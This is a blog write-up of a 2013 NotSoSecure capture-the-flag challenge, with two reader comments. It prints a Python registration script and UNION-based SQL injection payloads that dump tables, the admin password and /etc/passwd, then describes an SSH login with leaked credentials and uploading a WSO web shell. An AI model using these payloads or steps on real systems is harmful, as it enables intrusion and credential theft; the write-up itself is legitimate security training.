Access to challenge using a proxy like burp or zap and submit data to login. Notice the forwarded to:
http://ctf.notsosecure.com/71367217217126217712/checklogin.php that contains: 7365637265745f72656769737465722e68746d6c
This could be decoded ‘7365637265745f72656769737465722e68746d6c’.decode(‘hex’) in python to read secret_register.html
>>> '7365637265745f72656769737465722e68746d6c'.decode('hex')
'secret_register.html'
The registration page offers four fields that, when you register, create some session_id encoded in base64 which contains your email.
Read a hint launch on twitter (https://twitter.com/notsosecure/status/389714333061500928) about magic_quotes. It is a big hint !
We ‘pythonautomaticated’ our attack:
#!/usr/bin/python
from requests import get, post
from random import randint
from sys import argv
from urllib import quote, unquote
name = argv[-3]
password = argv[-2]
email = argv[-1]
print 'name:', name
print 'password:', password
print 'email:', email
url1='http://ctf.notsosecure.com/71367217217126217712/register.php'
url2='http://ctf.notsosecure.com/71367217217126217712/checklogin.php'
url3='http://ctf.notsosecure.com/71367217217126217712/uber_secret.php'
r = get(url1, params={'regname':name, 'regemail':email, 'regpass1':password, 'regpass2':password})
r = post(url2, data={'myusername':name, 'mypassword':password}, cookies=r.cookies)
r = get(url3, cookies=r.cookies)
print 'cookie:', unquote(r.cookies['session_id']).decode('base64')
See name of the table (users)
root@bt:~# python x.py "-1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -" "a" "a" name: -1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- - password: a email: a seesion_id: users dXNlcnM%3D
fields on table:
root@bt:~# python x.py " -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -" "a" "a" name: -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- - password: a email: a seesion_id: id,name,password,email aWQsbmFtZSxwYXNzd29yZCxlbWFpbA%3D%3D
final data:
root@bt:~# python x.py " -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -" "a" "a" name: -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- - password: a email: a seesion_id: 1adminsqlilabRocKs!!admin@sqlilabs.com MWFkbWluc3FsaWxhYlJvY0tzISFhZG1pbkBzcWxpbGFicy5jb20%3D
We login with admin:adminsqlilabRocKs and get the flag: «Well done, Flag is 815290. 2nd flag is in file secret.txt»
We use the same client to read /etc/passwd. See a user temp123 with weakpassword1.
root@bt:~# python x.py " -1' union select load_file('/etc/passwd'),2 -- -" "a" "a"
name: -1' union select load_file('/etc/passwd'),2 -- -
password: a
email: a
seesion_id:
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:103::/home/syslog:/bin/false mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:103:106::/var/run/dbus:/bin/false whoopsie:x:104:107::/nonexistent:/bin/false landscape:x:105:110::/var/lib/landscape:/bin/false sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash ctf:x:1000:1000:,,,:/home/ctf:/bin/bash temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh ntop:x:108:116::/var/lib/ntop:/bin/false
Login time
temp123@ctf.notsosecure.com's password: Welcome to Ubuntu 12.04.3 LTS (GNU/Linux 3.8.0-29-generic x86_64) * Documentation: https://help.ubuntu.com/ System information as of Fri Oct 25 08:47:07 BST 2013 System load: 0.0 Processes: 174 Usage of /: 4.5% of 28.18GB Users logged in: 2 Memory usage: 3% IP address for eth0: 88.208.239.33 Swap usage: 0% Graph this data and manage this system at https://landscape.canonical.com/ Last login: Fri Oct 25 08:37:55 2013 from cpc26-cmbg15-2-0-cust101.5-4.cable.virginm.net $ pwd /home/temp123
Upload a wso shell into public_html of the user. Delete php shell
$ cat /secret.txt
Well done, 2nd Flag is 128738213812990.
email both the flags to ctf@notsosecure.com with subject CTF FLAGS!
make sure you delete all the files you have created on the server so you dont allow other users easy points by using the files left by you on the server.
Please provide a detailed write up to qualify for cash prize!
The person with best write-up wins. You are allowed to publish the write-up on public site, but please do this after the CTF has finished (sunday, 27th October).
Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.
The next public CTF will take place in December.
Thanks
Sid
References & URL’s
http://ctf.notsosecure.com/leaderboard/
tunelko
diciembre 7, 2013Hi dead on arrival 2 mod ,
Thanks for your comments about this little blog. It’s a simple theme of genesis frameworks on wordpress: http://www.studiopress.com/
Regards.
dead on arrival 2 mod
diciembre 7, 2013I’m really impressed with your writing skills as well as with the layout on your blog.
Is this a paid theme or did you customize it yourself?
Either way keep up the excellent quality writing, it’s rare to see a nice blog like this one nowadays.